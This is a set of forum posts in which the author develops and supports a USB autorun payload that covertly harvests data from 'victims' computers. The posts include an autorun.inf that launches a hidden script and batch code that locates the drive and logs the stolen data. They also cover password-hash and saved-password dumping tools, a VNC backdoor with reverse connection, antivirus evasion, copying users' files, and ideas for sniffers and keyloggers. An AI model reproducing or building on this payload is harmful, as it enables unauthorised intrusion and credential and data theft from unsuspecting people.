Posts posted by GonZor

  1. --SNIP

    I've tried FORMAT in the batch file

    Here you go mate, This will quick format the drive to FAT with the volume label NUKED.

    FORMAT %1 /BACKUP /FS:FAT /V:NUKED /Q /X

    Obviously replace %1 with your drive letter variable.

    Sorry, no idea why formatting isn't working for you.

    The FORMAT wasn't working for the obvious reason, it required user input :P

    Why not make a batch using the "del" command?

    Although it seems simpler, It takes much longer. Neither option will securely delete your data but a quick format is much faster.

    Hope that answers everyone, and merry Christmas!

  2. GonZor,

    Nice job! The 'no disk' error is fixed!

    One more problem: the PWDUMP.EXE is not responding. The logfile is stuck at size 3Kb. (I'm running on a Windows XP Pro. x64...)

    Logging continues normally when I end PWDUMP.EXE in taskmanager.

    That's what I wanted to hear about the no disk error, for those of you interested I rewrote the drive search function in vbs because vbs is "smarter" and can detect what drives it needs to search, whereas with batch it was forcing a search even though the drive didn't exist.

    I will look into the PWDump problem, I haven't had an issue but it sounds like a problem with PWDump running on your system. Could you try running PWDump manually and see if it will run properly.

    wow the noobs seem to be taking over teh boards :P

    its getting waay too crowded for my liking  :(

    Who exactly are you referring to ? If you are referring to me, please elaborate or If you are referring to the people who are reporting bugs and such, simply go away I have asked them to. No one here claims to be a "1337 h4x0r", call me a noob if you like but your opinion means as much to me as a punch in the face (don't need it, don't want it).

    EDIT - DLSS, before you start calling us noobs take a look at this. Not only do they consider themselves "1337" but "santa" also originally claimed my payload as his. I must be doing something right if people wish to take ownership of it.

  3. To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.

    Quick'n dirty howto:

    1. Get a dyndns account to provide the current IP address
    2. Write some code to let the vnc.exe connect to your static hostname
    3. Get the vncviewer and run it in the listener mode

    If you'd like I can provide the code.

    Sounds Like a good Idea, I may incorporate this into the next release depending on the feedback.

  4. Finally out of beta:

    The long awaited V2.0 is now out of beta, sorry for the delay.

    What's New:

    • Restructured the payload and rewritten half the code (reduced size)
    • Fixed VNC (confirmed working - new password is "easy")
    • Added the option to use either FGDump or PWDump (or both)
    • Rewritten the search function in VBS, hopefully fixed the "no disk error"
    • Changed the way the files are named, now named as - "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%]"
    • Updated several parts so they are now undetected by most AV, to the best of my knowledge most AV's will only detect sbs.exe (part of the Hacksaw)

    * Please note for VNC to work you must have the correct ports forwarded on the "victims" router and firewall and such...

    I can't think of any other updates, though I may have forgotten some. Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...

    1. Extract the ISO to the root of your flash drive.
    2. Edit the AUTORUN.INF
    3. Run SBConfig from your flash drive.

    * Please note the U3 menu system will not function on a non U3 drive but the payload will work fine (don't enable the U3 menu in SBConfig and you will be fine)

    *If you don't Know how to make your own autorun.inf, use the following code

    [autorun]
    action=Enable USB Flash Drive
    open=wscript go.vbs

    As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have rewritten the search function in vbs and this should get rid of the problem but I may be wrong and have no way of testing. Thanks and once again sorry about the delays.

    EDIT: As usual Linky In my Sig
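The AUTORUN.INF quoted in the post above, an `open=` line that hands a script to `wscript`, is the pattern to look for when auditing removable media. The following is an added example, not part of the original post or the payload: a small Python checker that parses an autorun.inf and reports entries that would launch a program or script host. The function names and the benign sample are constructed for illustration.

```python
import re

# Interpreters that can run a script straight from the inserted drive.
SCRIPT_HOSTS = {"wscript", "cscript", "cmd", "powershell", "mshta", "rundll32"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
# [autorun] keys whose value is a command line Windows may execute.
COMMAND_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

# The autorun.inf quoted in the post above.
PAGE_SAMPLE = """[autorun]
action=Enable USB Flash Drive
open=wscript go.vbs
"""

# Constructed benign sample: only cosmetic keys, nothing is executed.
BENIGN_SAMPLE = """[autorun]
icon=drive.ico
label=Backup Drive
"""


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def audit_autorun(text):
    """List the entries a reviewer should look at in one autorun.inf."""
    findings = []
    entries = parse_autorun(text)
    for key, value in entries.items():
        if not COMMAND_KEY.match(key):
            continue
        tokens = value.replace('"', " ").split()
        if not tokens:
            continue
        program = tokens[0].lower().rsplit("\\", 1)[-1]
        stem = program.rsplit(".", 1)[0] if "." in program else program
        if stem in SCRIPT_HOSTS:
            findings.append(f"{key}: launches script host '{program}' -> {value}")
        elif any(t.lower().endswith(SCRIPT_EXTS) for t in tokens):
            findings.append(f"{key}: runs a script file -> {value}")
        else:
            findings.append(f"{key}: runs a program from the drive -> {value}")
    # The action= text is what the user sees in the AutoPlay dialog; report it
    # alongside a command so a misleading label stands out.
    if "action" in entries and any(COMMAND_KEY.match(k) for k in entries):
        findings.append(f"action: AutoPlay dialog text is '{entries['action']}'")
    return findings


if __name__ == "__main__":
    for name, sample in (("page", PAGE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, audit_autorun(sample) or "no executable entries")
```

Prevention is a policy setting rather than a scan: the `NoDriveTypeAutoRun` Explorer policy value `0xFF` turns AutoRun off for every drive type.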

  5. I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me.

    -------------------

    If you open up a cmd and type "set" this will display a list of variables set on your machine, a lot of them will be windows variables, but some may be specific to your machine. The windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line.

    file.exe /A:C "%homepath%\%username%\Desktop\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P

    Firstly I gave you the wrong variable  :-(

    The %homepath% variable expands to \Documents and Settings\%username%, you will notice that this doesn't have a drive letter so it will only work if run from the partition where windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so %homedrive%%homepath%. When expanded this would look something like this C:\Documents and Settings\%username%, when you look at the variable list you may have noticed the %userprofile% variable which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that.

    Secondly, I'm sure you have already figured this one out after reading that, the %homepath% variable (like the %userprofile% variable) expands to \Documents and Settings\%username% therefore when used like you have "%homepath%\%username%" it will expand to \Documents and Settings\%username%\%username% and as you can see wouldn't work.

    The solution, replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this.

    file.exe /A:C "%userprofile%\Desktop\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P

    Is there any way I can execute this keeping the window open so I can see my errors or what I'm doing wrong?

    My suggestion is to use SciTE (Scintilla Text Editor), It has syntax highlighting and also has a window to view the output of the code (that does not disappear). If you want a screen shot to explain what I mean I will upload one later, but for now I'm off to wendys :P

  6. -----------------------------

    I'll apologise now to all those people who I have not had time to answer your questions, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please pm me, you may not be the only person who wants to know.

    -----------------------------

    Hey Gonzor,

        Just wanna report in some personal bug feedback. 

    I am getting this message:

    ======================

    Windows - No Disk                          X

    ======================

    X    There is no disk in the drive.

          Please insert a disk into drive.

    |Cancel|  |Try Again|  |Continue|

    And it is the cmd.exe process that is running during this error.  This also occurs when Netpass runs (even when netpass is disabled [WTF?])

    Otherwise, the rest of the payload works like a charm.  Hacksaw works perfectly - just as long as I log in and stuff like you said.  Keep up the good work!

    This has been annoying me quite a bit, from what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand and there have been several parts of the story that vary for each person so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled). The HakSaw should actually work now without having to wait until the next time you log on, let me know if it isn't because it works for me so I will have to test that.

    Thanks a lot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually :grin:

    No problem, just giving back what I can.

    Just thought I would say the problem seems to be "%Documents and Settings%" variable. By changing it to C:\Documents and Settings everything works fine this goes for file.exe. Also tried xcopy same issue. Anyone else had this problem?

    I feel so stupid, This is why we should learn to read properly... * GonZor slaps self

    There is no "%Documents and Settings%" variable, assuming your <source> now looks like this

    "C:\Documents and Settings\%username%\My Documents\*.jpg"

    The "%homepath%" variable will expand to what you want. hence the <source> could be rewritten as this which is better in case they have windows installed on another partition.

    "%homepath%\My Documents\*.jpg"

    I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???

    Unfortunately some of the tools are detected by certain AV, I was unaware of trend micro detecting fgdump and cachedump. It's odd that it allowed those tools to dump the information, you should look at your AV settings and change them to deny access for these programs.

    -----------------------------

    Are you Mark Frederickson? If so please pm me asap.

    -----------------------------

    how do i get this to work all i get when i click it is it flashes cmd for a sec and disappears

    and can u make a U3 version?

    File (file.exe)  DOWNLOAD

    This tool is similar to fc.exe. But while the function is the same, operations are different, you can choose more than one searchmask and do different tasks like Copying, Moving, Deleting, ...

    Warning: Like my other tools, this is Beta software. I'm not responsible for any damages on your or other systems.

    It's a command line tool, it doesn't have a gui. read the parameter in the first post...

    Why I've created this:

    Because fc.exe has several bugs, some fixed here.

    Parameter:

    file.exe /A:[C D M SD] "C:\*.txt + C:\*.doc" "X:\Files" [/I] [/O] [/P] [/Box] [/Log] [/Debug]
    file.exe /A:SC <Target> <Linkfile> [<Workingdir> <Args> <Description> <Icon> <Shortcutkey> <IconNo> <Max|Min|Normal>] [/Debug]
    file.exe /A:E
    file.exe /Src

    /A:C      Copies found Files to the Targetfolder
    /A:M      Moves found Files to the Targetfolder
    /A:D      Deletes found Files
    /A:SD     Moves found Files to Paper Bin
    /A:SC     Creates a Shortcut
    /A:E      Empties the Paper Bin
    /I        Includes Subfolders to the Search
    /O        Overwrites Files into the Targetdirectory (Only Copying and Moving)
    /P        Creates the same Folder Structure as Found (Only Copying and Moving)
    /Box      Shows a Messagebox after Finishing
    /Log      Creates a Logfile into the Targetfolder (Copying and Moving into the Targetfolder, Deleting into Tempfolder)
    /Debug    Shows a Messagebox which Contains all Variables and their Values
    /Src      Appends the Sourcecode to a .ahk File

    "C:\*.txt + C:\*.doc"    Strings which shall be searched
    "X:\Files"               Targetfolder where the Files shall be copied/moved

    For the Shortcutsyntax: If you want to omit a parameter you have to define it like "" for empty space.
    Else it will fail or define the parameter wrong.

    Examples:
    file.exe /A:SC C:\Downloads Downloads.lnk "" "" Downloaddirectory
        Creates a Shortcut to the Folder C:\Downloads, Linkfile is Downloads.lnk at the Scriptdirectory,
        no workingdir, no arguments but a Description (It's the Downloaddirectory)

    file.exe /A:D "C:\Dokumente und Einstellungen\Obi-Wahn\Desktop\*.lnk"
        Deletes all Shortcuts on the Desktop WITHOUT moving them to the Paperbin

    file.exe /A:SD "C:\Dokumente und Einstellungen\Obi-Wahn\Desktop\*.lnk"
        Deletes all Shortcuts on the Desktop and moves them to the Paperbin.

    file.exe /A:C "C:\*.txt" "X:\Files" /I /P
        Copies all Textfiles to the Targetdirectory (X:\Files), includes Subfolders to the search
        and creates the same folder structure as on the Computer.

  8. I actually wasn't sure what this could be used for, but it could be helpful. Also, the board in which it sits has a lot of good info on silent installation of various programs.

    Easiest way to silently install something is to make a msi

    It looks to me like you're defining the flash partition as drive i: I don't see how it gets defined as %fd%

    Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.

    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

    FOR %variable IN (set) DO <command>

    %variable specifies a single letter variable (my chosen variable %%i)

    (set) specifies what the variable will be each time (in this case the alphabet)

    <command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)

        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
        IF EXIST %%i:\System\SRC\drv.dat (

    The first command for each variable, IF EXIST <file> <command>

    <file> specifies the file to search for (in this case we are searching for the file \System\SRC\drv.dat but this can be changed to any file)

    <command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)

            SET fd=%%i:\System\SRC

    This is the command to be completed once the file is found to exist, SET <variable>=<string>

    <variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%)

    <string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path \System\SRC)

            )
            )

    These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command.

    This could be written as one line but for readability I use the brackets. I hope that made sense but time now for some sleep  :shock:

  10. So none of the AVs pick  this one up as of yet? even if u have it pull all the passwords? Also would it be possible to add a Firefox Password Puller?

    @setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords"

    NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe)

    The script for getting all the account info for  email Addy and pass is great! Is there one in order to get the myspace password also??

    Just curious. . . . . . . . . .

    Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know I've never used it.

  12. @ GonZor,

    Using your script with file.exe and it isn't working am I doing something wrong?

    To be honest I have never used file.exe so I am unfamiliar with how its used but looking at your code, I am going to assume the last three lines should look like this:

    file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.jpg" "%fd%\Documents\%computername%\Pictures" /I /P

    file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.bmp" "%fd%\Documents\%computername%\Pictures" /I /P

    file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.gif" "%fd%\Documents\%computername%\Pictures" /I /P

    assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. The problem was you were saying the destination was on the CD partition (which you obviously can't write to a CDFS partition).

  13. Another way to do this is to use PStart.exe, which I personally prefer, but to each his own.

    Personally I use both, the main reason as pointed out by oligarchy314:

    I like this better than all those start menu replacement programs, because this does not add a process, and thereby uses no ram or cpu cycles.

    Although when you have a number of apps organization is a must and pstart is better for that.

  14. In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

    SET include="G:\SRC\Include

    IF EXIST %include%\0.dat"

    When the second line is expanded it will look like this

    "G:\SRC\Include\0.dat"

    Note the " on either end, If I were to enclose each in " like so

    SET include="G:\SRC\Include"

    IF EXIST "%include%\0.dat"

    When the second line is expanded it will look like this, and fail

    ""G:\SRC\Include"\0.dat"

    To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

    Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.

    I'm doing some tweaks to it now and compiling the batch files to executables, etc.

    I'd love to take a look at the tweaks you've made, as well as the executable. What language?

    ...So if you do create a virus/worm/trojan/etc... you haven't done anything illegal yet. Once you deploy the malware, then you have committed a felony.

    By deploy do you mean distribute (as in the way the switchblade/hacksaw has been amongst the community) or use maliciously (using the switchblade/hacksaw in an unauthorized situation)

  16. You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload.

    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
        IF EXIST %%i:\NUL.EXT (
            :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
            IF EXIST %%i:\System\SRC\drv.dat (
                SET fd=%%i:\System
            )
        )
    )

    :: CREATE LOG DIRECTORY
    IF NOT EXIST %fd%\Logs\%computername% (
        MD %fd%\Logs\%computername%
    )
    :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
    DIR /a-d /s "%fd%\Logs\%computername%" | FIND /c ".log" > "%fd%\SRC\###"
    SET /p count=<"%fd%\SRC\###"
    :: SET LOG PATH
    SET log="%fd%\Logs\%computername%\%computername%-[%count%].log"

    Create a file on your flash partition \System\SRC\drv.dat.  Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:\System\Logs\%computername%\%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.

  17. The current Winrar script works well enough, but yeah, TrueCrypt will provide the be-all end-all solution.

    TrueCrypt isn't the be-all end-all solution, for the reasons specified below...

    The problem with true crypt is, that you need the driver installed on the system if you're not an admin to work with it.

    A lot of the tools used in the payload (specifically the ones that get detected by AV) need an admin account to work, I would create a combination of true crypt and rar.

  18. It all seemed simple enough right?

    copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup

    Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me)...

    You were missing the quotes from around your destination, it should have read

    copy "H:WIPCMDVirtuMem.exe" "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /y

    Notice the quotes around the source and destination paths, didn't need them around the source because there are no spaces but I do it anyway, I also added a /y switch to copy the file even if it exists (just to make sure it's your file not a dummy file).

  19. Thanks Gonzor.

    Could be interesting for next versions add some features like try to catch domain passwords, (I don't know if this could be possible) or install any kind of sniffer for to get "on the fly" passwords.

    another idea its to add a Keylogger...

    what do you think about?

    The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.

    First of all check out my payload, take a look at SRC\go.bat in the ISO. Have you considered how you are going to make this customizable? Take a look at how my payload works because you won't be able to comment out parts of the payload you don't want on a CDFS partition.

    If you need any help just ask. If you want an explanation of any of my payload just ask I haven't commented go.bat very well
